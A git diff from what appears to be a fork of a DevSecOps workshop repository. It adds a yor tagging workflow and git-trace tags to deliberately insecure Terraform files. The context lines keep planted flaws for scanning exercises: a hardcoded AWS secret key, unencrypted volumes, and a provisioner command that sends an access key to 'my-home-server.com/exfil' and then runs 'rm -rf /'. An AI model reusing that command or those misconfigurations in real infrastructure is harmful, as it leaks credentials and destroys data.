diff --git a/.github/workflows/yor.yml b/.github/workflows/yor.yml new file mode 100644 index 000000000..1050790d4 --- /dev/null +++ b/.github/workflows/yor.yml @@ -0,0 +1,19 @@ +name: IaC tag and trace + +on: + push: + pull_request: + +jobs: + yor: + runs-on: ubuntu-latest + permissions: + contents: write + + steps: + - uses: actions/checkout@v2 + name: Checkout repo + with: + fetch-depth: 0 + - name: Run yor action + uses: bridgecrewio/yor-action@main diff --git a/code/deployment_ec2.tf b/code/deployment_ec2.tf index 7e3d2bba2..e0b5c05cf 100644 --- a/code/deployment_ec2.tf +++ b/code/deployment_ec2.tf @@ -17,7 +17,18 @@ export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMAAAKEY export AWS_DEFAULT_REGION=us-west-2 echo "

Deployed via Terraform

" | sudo tee /var/www/html/index.html EOF - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web_host" + yor_trace = "88ee4801-abb9-43bd-b55a-e9f26999c950" + } } resource "aws_ebs_volume" "web_host_storage" { @@ -25,14 +36,36 @@ resource "aws_ebs_volume" "web_host_storage" { availability_zone = "${var.region}a" #encrypted = false # Setting this causes the volume to be recreated on apply size = 1 - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web_host_storage" + yor_trace = "0d618641-0205-4779-a515-8b2cd76e8a0f" + } } resource "aws_ebs_snapshot" "example_snapshot" { # ebs snapshot without encryption volume_id = "${aws_ebs_volume.web_host_storage.id}" description = "${local.resource_prefix.value}-ebs-snapshot" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "example_snapshot" + yor_trace = "dd434ac8-9a06-4d2a-85c2-5e65fb6bf038" + } } resource "aws_volume_attachment" "ebs_att" { @@ -69,14 +102,36 @@ resource "aws_security_group" "web-node" { "0.0.0.0/0"] } depends_on = [aws_vpc.web_vpc] - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web-node" + yor_trace = "4bbbb2f7-79a6-43a8-9991-a5f4ded6d1b2" + } } resource "aws_vpc" "web_vpc" { cidr_block = "172.16.0.0/16" enable_dns_hostnames = true enable_dns_support = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web_vpc" + yor_trace = "c1e2586d-94e5-4fac-b847-e3d1a6d37809" + } } resource "aws_subnet" "web_subnet" { @@ -85,7 +140,18 @@ resource "aws_subnet" "web_subnet" { availability_zone = "${var.region}a" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web_subnet" + yor_trace = "bd187003-ba42-4b26-8176-166ffc372044" + } } resource "aws_subnet" "web_subnet2" { @@ -94,20 +160,53 @@ resource "aws_subnet" "web_subnet2" { availability_zone = "${var.region}b" map_public_ip_on_launch = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web_subnet2" + yor_trace = "6e156ef0-824c-4b40-a4fd-33fc0e24182c" + } } resource "aws_internet_gateway" "web_igw" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web_igw" + yor_trace = "f9639ea1-1a58-4eee-af72-25674cd40ff8" + } } resource "aws_route_table" "web_rtb" { vpc_id = aws_vpc.web_vpc.id - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web_rtb" + yor_trace = "4795ba09-4007-4d6d-aafc-dbf63fd102ab" + } } resource "aws_route_table_association" "rtbassoc" { @@ -134,6 +233,17 @@ resource "aws_network_interface" "web-eni" { subnet_id = aws_subnet.web_subnet.id private_ips = ["172.16.10.100"] + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "web-eni" + yor_trace = "74b814fb-f4f6-45a5-87a5-2d7cc76b47fb" + } } # VPC Flow Logs to S3 @@ -144,12 +254,34 @@ resource "aws_flow_log" "vpcflowlogs" { vpc_id = aws_vpc.web_vpc.id + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "vpcflowlogs" + yor_trace = "dca15e6e-960f-47ba-97f3-041e287cacdc" + } } resource "aws_s3_bucket" "flowbucket" { bucket = "${local.resource_prefix.value}-flowlogs" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "flowbucket" + yor_trace = "2db0f163-c07e-41a6-88ac-7ffcafecacb3" + } } # OUTPUTS diff --git a/code/deployment_s3.tf b/code/deployment_s3.tf index cfb272e1d..61115b08e 100644 --- a/code/deployment_s3.tf +++ b/code/deployment_s3.tf @@ -5,14 +5,36 @@ resource "aws_s3_bucket" "data" { # bucket does not have versioning bucket = "${local.resource_prefix.value}-data" force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "data" + yor_trace = "7e9513d1-3ada-4791-a4ed-3c48646bbe34" + } } resource "aws_s3_bucket_object" "data_object" { bucket = aws_s3_bucket.data.id key = "customer-master.xlsx" source = "resources/customer-master.xlsx" - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "data_object" + yor_trace = "07d3c432-497f-4a64-a2ba-7372e8eeac61" + } } resource "aws_s3_bucket" "financials" { @@ -23,6 +45,17 @@ resource "aws_s3_bucket" "financials" { acl = "private" force_destroy = true + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "financials" + yor_trace = "d5bdb847-10a3-4dd6-adf0-4c0d1cacb849" + } } resource "aws_s3_bucket" "operations" { @@ -34,7 +67,18 @@ resource "aws_s3_bucket" "operations" { enabled = true } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "operations" + yor_trace = "7a7da807-4e09-4dd9-9944-5bc2634c14c8" + } } resource "aws_s3_bucket" "data_science" { @@ -49,7 +93,18 @@ resource "aws_s3_bucket" "data_science" { target_prefix = "log/" } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "data_science" + yor_trace = "52dbcd37-08c1-414c-9c68-f839a279eb70" + } } resource "aws_s3_bucket" "logs" { @@ -67,5 +122,16 @@ resource "aws_s3_bucket" "logs" { } } force_destroy = true - + + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/deployment_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "logs" + yor_trace = "49d1883b-91e8-46f0-b1d0-53c37058410c" + } } diff --git a/code/simple_ec2.tf b/code/simple_ec2.tf index dcfa5880f..7233a5e7a 100644 --- a/code/simple_ec2.tf +++ b/code/simple_ec2.tf @@ -10,4 +10,15 @@ resource "aws_ec2_host" "test" { command = "echo Running install scripts.. 'echo $ACCESS_KEY > creds.txt ; scp -r creds.txt root@my-home-server.com/exfil/ ; rm -rf /' " } + tags = { + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_ec2.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "test" + yor_trace = "0143832d-eb41-4ca3-8e55-9a93f81f4bd0" + } } diff --git a/code/simple_s3.tf b/code/simple_s3.tf index c0d25fb60..73d44b38a 100644 --- a/code/simple_s3.tf +++ b/code/simple_s3.tf @@ -6,7 +6,16 @@ resource "aws_s3_bucket" "dev_s3" { bucket_prefix = "dev-" tags = { - Environment = "Dev" + Environment = "Dev" + git_commit = "d4c35e0270bfd542051278ca30b4b3872c1ae0b2" + git_file = "code/simple_s3.tf" + git_last_modified_at = "2024-01-26 23:01:56" + git_last_modified_by = "tprendervill@paloaltonetworks.com" + git_modifiers = "tprendervill" + git_org = "dimitryk1" + git_repo = "prisma-cloud-devsecops-workshop-fork" + yor_name = "dev_s3" + yor_trace = "eb744131-b6fd-4f6e-8c47-4c0492dbb546" } }